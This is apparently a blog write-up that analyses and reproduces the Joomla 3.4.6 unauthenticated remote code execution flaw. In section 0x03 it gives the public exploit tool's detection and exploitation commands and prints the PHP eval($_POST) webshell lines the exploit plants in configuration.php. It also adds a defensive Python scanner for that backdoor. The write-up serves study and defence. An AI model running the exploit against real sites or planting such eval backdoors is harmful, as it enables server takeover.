Joomla 3.4.6 remote code execution vulnerability analysis and reproduction

0x00 CMS introduction

Joomla! is a world-renowned content management system, developed in PHP on top of a MySQL database; the latest version is 3.9.11. It runs on a variety of platforms, including Linux, Windows and macOS. Development and support are currently carried out by Open Source Matters, an open-source organization whose roughly 150 members come from all over the world and include developers, designers, system administrators and documentation writers, with more than 20,000 participating community members.
Since the awards began in 2012, the Joomla CMS has been a champion for many years. Following 2015, 2016, 2017 and 2018, it again won the "Best Open Source CMS" award in the global CMS evaluation.

0x01 Vulnerability profile

  • On 2019-10-02 Alessandro Groppo of Hacktive Security published an exploit for Joomla command execution on exploit-db (https://www.exploit-db.com/exploits/47465). The vulnerability is essentially a mishandling of Joomla session data: an unauthenticated attacker can send a maliciously crafted HTTP request to obtain server permissions and execute commands remotely.
  • Affected range: 3.0.0 <= Joomla <= 3.4.6

0x02 Environment setup

I built the environment with phpStudy.
Joomla download: https://downloads.joomla.org/it/cms/joomla3/3-4-6
After a successful installation, the home page looks like this:

0x03 Vulnerability reproduction

EXP: https://github.com/kiks7/rusty_joomla_rce
1. Vulnerability detection

python rusty_joomla_exploit.py -t http://quan.joomla346.net/ -c

The result is as follows; the "Vulnerable" output proves that the vulnerability exists.
2. Exploitation

rusty_joomla_rce-master>python rusty_joomla_exploit.py -t http://quan.joomla346.net/ -e -l quan.joomla346.net -p 80

The written webshell can be seen in configuration.php (I ran the exploit several times here, so there are several copies):

if(isset($_POST['epgijbodvzllittceoyidpbbglcdawduhyvqqtdndfxjfivvkg'])) eval($_POST['epgijbodvzllittceoyidpbbglcdawduhyvqqtdndfxjfivvkg']);if(isset($_POST['bhjhofjrtfrlskgaufapblryaqymfzrrbaoluyljwgekkoakhm'])) eval($_POST['bhjhofjrtfrlskgaufapblryaqymfzrrbaoluyljwgekkoakhm']);if(isset($_POST['dzyxxxhejymxvidysrisgguzvbehpuudwgkwcgldarnnlkxgbj'])) eval($_POST['dzyxxxhejymxvidysrisgguzvbehpuudwgkwcgldarnnlkxgbj']);

Connect with the Caidao ("kitchen knife") webshell client.

0x04 Fix

Update to the latest version from the official website.
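As an added example (not part of the original post or of the rusty_joomla_rce tool), here is a defender-side check in Python: it scans a configuration.php for the eval($_POST[...]) backdoor shape shown in 0x03 and tests a version string against the affected range stated in 0x01. The sample configuration content is constructed, and the path passed to scan_file is a hypothetical argument.

```python
import re
from typing import List, Tuple

# Matches the backdoor shape the exploit writes into configuration.php:
#   if(isset($_POST['name'])) eval($_POST['name']);
# The backreference requires the same parameter name in both places.
BACKDOOR_RE = re.compile(
    r"if\s*\(\s*isset\s*\(\s*\$_POST\s*\[\s*['\"]([A-Za-z0-9_]+)['\"]\s*\]\s*\)\s*\)\s*"
    r"eval\s*\(\s*\$_POST\s*\[\s*['\"]\1['\"]\s*\]\s*\)\s*;"
)


def find_eval_backdoors(php_source: str) -> List[str]:
    """Return the POST parameter names of every eval() backdoor in the source."""
    return BACKDOOR_RE.findall(php_source)


def scan_file(path: str) -> List[str]:
    """Scan a configuration.php on disk (hypothetical path supplied by the caller)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return find_eval_backdoors(fh.read())


def parse_version(version: str) -> Tuple[int, ...]:
    return tuple(int(part) for part in version.strip().split("."))


def is_affected_version(version: str) -> bool:
    """True if 3.0.0 <= version <= 3.4.6, the range given in the advisory."""
    return parse_version("3.0.0") <= parse_version(version) <= parse_version("3.4.6")


# Constructed sample: a minimal configuration.php with two injected backdoor lines
SAMPLE_CONFIG = (
    "<?php\n"
    "class JConfig {\n"
    "\tpublic $offline = '0';\n"
    "\tpublic $sitename = 'Joomla test';\n"
    "}\n"
    "if(isset($_POST['abcdefghij'])) eval($_POST['abcdefghij']);"
    "if(isset($_POST['klmnopqrst'])) eval($_POST['klmnopqrst']);\n"
)

if __name__ == "__main__":
    for name in find_eval_backdoors(SAMPLE_CONFIG):
        print(f"eval() backdoor found, POST parameter: {name}")
    print("affected version 3.4.6:", is_affected_version("3.4.6"))
    print("affected version 3.9.11:", is_affected_version("3.9.11"))
```

Run it against a site's real configuration.php with scan_file after any suspected compromise; a clean Joomla configuration file contains only the JConfig class and never an eval() call.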

0x05 References

https://mp.weixin.qq.com/s/1LJJG-whv1vUfaWDSfA2gg

Source: www.cnblogs.com/0nc3/p/12071266.html